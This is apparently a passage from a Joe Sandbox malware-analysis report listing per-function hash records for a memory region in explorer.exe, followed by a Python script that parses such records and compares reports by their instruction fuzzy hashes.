                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c93f8b10213169d975d12f236c8cd42e3d51a3ad3ea86ff868a6eb24b3f43890
                                                • Instruction ID: d5ab1d0161380cb782a61ea773f925054e1caf2ea0fdcc411f222da77ee16708
                                                • Opcode Fuzzy Hash: c93f8b10213169d975d12f236c8cd42e3d51a3ad3ea86ff868a6eb24b3f43890
                                                • Instruction Fuzzy Hash: EBF09A71C98A0D9EEB54EB68C8986BDBBF2FF54344F4400B9D419E70D2EE346A84C741
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 645b19fe3e99bae36548be009377c9570c4c1f46bf5ed495e69e4f0fff59995f
                                                • Instruction ID: 0cf442c9256e38e597dcd44edbc961c602b5e4fbd9096ab4c91d8e03189fc83b
                                                • Opcode Fuzzy Hash: 645b19fe3e99bae36548be009377c9570c4c1f46bf5ed495e69e4f0fff59995f
                                                • Instruction Fuzzy Hash: DAE02621C4CB910FD7A46265A4951947AE1EF1521070901EFC58AC7183FD5CAC418306
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6af7ff6d7501a869f59b537104d89896a3fa1f0425b331a2ca2a26ed552bbc19
                                                • Instruction ID: 57f7577a1d49d2bf09f05cd4e3188b197c2412d08049d3dc82f07ed40d66bef9
                                                • Opcode Fuzzy Hash: 6af7ff6d7501a869f59b537104d89896a3fa1f0425b331a2ca2a26ed552bbc19
                                                • Instruction Fuzzy Hash: 11E0867188D54D4BDB15EF54DD412FD7A61FF45340F040939E42D83081EB79A564C781
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97bfa5060d875485e233d4bed1db59b9af19020b824eb5e0b00f8b52afc98504
                                                • Instruction ID: 452336cfe936869eea86079998c6101cdd9a0e236f77e5d2e0ad2e7bbc5eeca2
                                                • Opcode Fuzzy Hash: 97bfa5060d875485e233d4bed1db59b9af19020b824eb5e0b00f8b52afc98504
                                                • Instruction Fuzzy Hash: ADB09211B5C8090A67E4A11CA14563E00D7ABD81A0724037FC00DC328DEC1878038286
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6065ccd08c7418a69208a1c5074202534f9f6e7e785a7e38a9a230fa036e8997
                                                • Instruction ID: 3c439a2212727a4832c59dda22c18d2e97fef6496700cc0b30c5211f21f3c917
                                                • Opcode Fuzzy Hash: 6065ccd08c7418a69208a1c5074202534f9f6e7e785a7e38a9a230fa036e8997
                                                • Instruction Fuzzy Hash: 83B09200CCC40390E724296084C11BC2832BF08398EB00578C00F03081FE0E3084E202
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (0E$(0E$N_^$r6B
                                                • API String ID: 0-2372584359
                                                • Opcode ID: 92c68ebeac3cb993a4c2d82b14b6fd20a033c7868c9add6747ae303e9cc6c2a3
                                                • Instruction ID: 327559b29b73146feefa9c5c3ec88fde4710ba32b45ff5a19050b1cf797104b9
                                                • Opcode Fuzzy Hash: 92c68ebeac3cb993a4c2d82b14b6fd20a033c7868c9add6747ae303e9cc6c2a3
                                                • Instruction Fuzzy Hash: E2A1CA22F4CE4A4BEB98EA5CA4E56F937E2FF94395714017BC44DC7187EE18E8468341
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CY_H$b4B$b4B$b4B
                                                • API String ID: 0-1829337378
                                                • Opcode ID: 1aab314fb63a78175df9b7943281cc74e1797f40b92e83f27a60a3a5be666ecf
                                                • Instruction ID: 555707acd2888ed78a9c93810fa9aa29502485d7f2c84e6541a4b03605c3b8bb
                                                • Opcode Fuzzy Hash: 1aab314fb63a78175df9b7943281cc74e1797f40b92e83f27a60a3a5be666ecf
                                                • Instruction Fuzzy Hash: 1F513B71D58A5D9FDB98DBACC451AACBBF2FF59391F10017AC40DE7282DE286841CB41
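The entries above are the Joe Sandbox IDA plugin's per-function records for the code region at 0x7FF887C60000 inside the explorer process (snapshot hcaresult_27_2_7ff887c60000_explorer.jbxd); the Instruction Fuzzy Hash on each one is the value you would reuse to check whether a dump from another sample carries the same functions. The parser below is an added example, not Joe Sandbox code and not part of the original report: it turns this text layout into records (keeping the "Strings" marker and the empty "API ID" style fields), parses the Source File line into a numeric offset, and computes the overlap of two reports' hash sets. REPORT_EXCERPT is copied verbatim from two of the entries above; OTHER_EXCERPT is a constructed second report whose second hash is a placeholder that matches nothing, used only to exercise the comparison.

```python
"""Parse Joe Sandbox IDA-plugin function entries and compare two reports' hash sets.
Added example, not Joe Sandbox code. REPORT_EXCERPT is copied from the entries
above; OTHER_EXCERPT is a constructed second report (one placeholder hash)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

ENTRY_START = "Memory Dump Source"
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")   # "• Key: value" bullet
SOURCE_RE = re.compile(r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)", re.I)


@dataclass
class FunctionEntry:
    source_file: str = ""
    offset: int = 0
    based_on_pe: bool = False
    snapshot_file: str = ""
    has_strings: bool = False                    # preceded by a 'Strings' marker
    fields: dict = field(default_factory=dict)   # remaining "• Key: value" bullets


def parse_entries(text: str) -> list[FunctionEntry]:
    """One FunctionEntry per 'Memory Dump Source' block; empty bullets are kept as ""."""
    entries: list[FunctionEntry] = []
    cur: FunctionEntry | None = None
    pending_strings = False
    for line in (ln.strip() for ln in text.splitlines()):
        if line == "Strings":                    # marker applies to the entry that follows
            pending_strings = True
        elif line == ENTRY_START:
            cur = FunctionEntry(has_strings=pending_strings)
            pending_strings = False
            entries.append(cur)
        elif cur is not None and (m := FIELD_RE.match(line)):   # skips 'Similarity' etc.
            key, val = m.group("key").strip(), m.group("val").strip()
            if key == "Source File" and (s := SOURCE_RE.search(line)):
                cur.source_file, cur.offset = s.group("file"), int(s.group("off"), 16)
                cur.based_on_pe = s.group("pe").lower() == "true"
            elif key == "Snapshot File":
                cur.snapshot_file = val
            else:
                cur.fields[key] = val
    return entries


def hash_set(entries: list[FunctionEntry], key: str = "Instruction Fuzzy Hash") -> set[str]:
    return {e.fields[key] for e in entries if e.fields.get(key)}


def compare_reports(text_a: str, text_b: str) -> dict:
    """Shared instruction-fuzzy-hash count and Jaccard overlap of two report excerpts."""
    ha, hb = hash_set(parse_entries(text_a)), hash_set(parse_entries(text_b))
    union = ha | hb
    return {"a": len(ha), "b": len(hb), "shared": len(ha & hb),
            "jaccard": len(ha & hb) / len(union) if union else 1.0}


# Two entries copied verbatim from the report section above (explorer, region 0x7FF887C60000).
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6065ccd08c7418a69208a1c5074202534f9f6e7e785a7e38a9a230fa036e8997
• Instruction ID: 3c439a2212727a4832c59dda22c18d2e97fef6496700cc0b30c5211f21f3c917
• Opcode Fuzzy Hash: 6065ccd08c7418a69208a1c5074202534f9f6e7e785a7e38a9a230fa036e8997
• Instruction Fuzzy Hash: 83B09200CCC40390E724296084C11BC2832BF08398EB00578C00F03081FE0E3084E202
Strings
Memory Dump Source
• Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
Similarity
• API ID:
• String ID: (0E$(0E$N_^$r6B
• API String ID: 0-2372584359
• Opcode ID: 92c68ebeac3cb993a4c2d82b14b6fd20a033c7868c9add6747ae303e9cc6c2a3
• Instruction ID: 327559b29b73146feefa9c5c3ec88fde4710ba32b45ff5a19050b1cf797104b9
• Opcode Fuzzy Hash: 92c68ebeac3cb993a4c2d82b14b6fd20a033c7868c9add6747ae303e9cc6c2a3
• Instruction Fuzzy Hash: E2A1CA22F4CE4A4BEB98EA5CA4E56F937E2FF94395714017BC44DC7187EE18E8468341
"""
# Constructed second report (not from any real analysis): one hash shared with the
# excerpt above, one placeholder that matches nothing.
OTHER_EXCERPT = """\
Memory Dump Source
• Instruction Fuzzy Hash: E2A1CA22F4CE4A4BEB98EA5CA4E56F937E2FF94395714017BC44DC7187EE18E8468341
Memory Dump Source
• Instruction Fuzzy Hash: CONSTRUCTED-PLACEHOLDER-HASH
"""

if __name__ == "__main__":
    for e in parse_entries(REPORT_EXCERPT):
        print(f"{e.offset:#x} strings={e.has_strings} ifh={e.fields['Instruction Fuzzy Hash'][:16]}...")
    print(compare_reports(REPORT_EXCERPT, OTHER_EXCERPT))
```

Only the Instruction Fuzzy Hash is used for the overlap because the Opcode ID and Opcode Fuzzy Hash carry the same value in every entry above, so comparing all three would count each function three times. Feed `parse_entries` the whole function listing of a report and the hash set becomes a cheap first-pass indicator of code reuse between dumps; a high Jaccard score is a prompt to open the two snapshots side by side, not a verdict.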